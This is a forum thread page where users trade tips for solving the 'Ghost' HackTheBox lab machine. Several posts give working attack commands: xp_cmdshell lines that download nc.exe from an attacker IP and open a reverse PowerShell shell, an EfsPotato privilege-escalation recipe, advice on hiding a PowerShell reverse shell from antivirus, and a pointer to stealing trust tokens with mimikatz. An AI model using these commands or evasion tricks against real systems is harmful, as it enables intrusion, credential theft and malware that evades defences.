Jul 14, 2024, 05:12 PM
From mssql this is unintended way. Anybody know intended?
|
Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
|
|
Jul 14, 2024, 05:12 PM
From mssql this is unintended way. Anybody know intended?
(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably? I used mssqlclient, use_link [PRIMARY] and exec_sa_login (it is described in the thread somewhere) then enabled xp_cmdshell and ran a reverse shell (Jul 14, 2024, 05:12 PM)jsvensson Wrote: From mssql this is unintended way. Anybody know intended? No, but I guess it involves ADFS in some way...
Jul 14, 2024, 05:32 PM
Jul 14, 2024, 05:37 PM
xp_cmdshell "echo IWR http://10.10.xx.xx:8000/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile"
xp_cmdshell "%TEMP%\nc.exe 10.10.xx.xx6666 -e powershell.exe" although I used my own nc, idk how the one with kali works....
Jul 14, 2024, 06:17 PM
guys after mssql what to do
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Jul 14, 2024, 06:32 PM
(Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag You're not done
Jul 14, 2024, 06:38 PM
How the hell bypass av to get meterpreter or other wat to get nt-authority?
guys use efs potato to get system
https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618 ./EfsPotato.exe 'whoami' This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Jul 14, 2024, 07:08 PM
(Jul 14, 2024, 07:02 PM)jimmyshoemacher Wrote:(Jul 14, 2024, 06:38 PM)jsvensson Wrote: How the hell bypass av to get meterpreter or other wat to get nt-authority? nc.exe certainly works too. download the nc.exe to c:\users\public\documents. for some reason windows defender doesn't flag nc.exe (Jul 14, 2024, 05:28 PM)JAGS_BLAST Wrote:(Jul 14, 2024, 05:14 PM)a44857437 Wrote:(Jul 14, 2024, 05:03 PM)JAGS_BLAST Wrote:(Jul 14, 2024, 05:02 PM)a44857437 Wrote: I'm SYSTEM on the (PRIMARY) server, but where are the flags? On the DC probably? I cobbled together a powershell rev shell where I masked a number of calls and modules with '*' so they are not really visible to AV anymore (Jul 14, 2024, 06:15 PM)shadow_monarch Wrote: where is the root and user flag If you got here through the rev shell via mssql server, you're on the PRIMARY machine (part of corp.ghost.htb), the flags are on dc01, you have to abuse the trust and steal the trust token with mimikatz |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,590 |
35 minutes ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,944 |
9 hours ago Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,799 |
10 hours ago Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,616 |
Today, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,269 |
Yesterday, 02:10 PM Last Post: kkkato |
||